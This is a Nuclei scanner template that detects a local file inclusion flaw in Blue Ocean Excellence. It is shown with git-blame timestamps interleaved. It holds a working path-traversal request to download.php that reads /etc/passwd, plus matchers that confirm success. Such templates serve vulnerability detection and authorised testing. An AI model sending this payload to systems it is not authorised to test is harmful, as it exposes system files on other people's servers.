nuclei-templates/vulnerabilities/other/blue-ocean-excellence-lfi.yaml

33 lines
720 B
YAML
Raw Normal View History

2021-05-31 09:29:51 +00:00
id: blue-ocean-excellence-lfi
info:
name: Blue Ocean Excellence - Local File Inclusion
2021-05-31 09:29:51 +00:00
author: pikpikcu
2021-05-31 10:14:21 +00:00
severity: high
description: Blue Ocean Excellence is vulnerable to local file inclusion.
reference:
- https://blog.csdn.net/qq_41901122/article/details/116786883
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-05-31 09:29:51 +00:00
tags: blue-ocean,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-05-31 10:14:21 +00:00
- "toor:[x*]:0:0"
2021-05-31 09:29:51 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22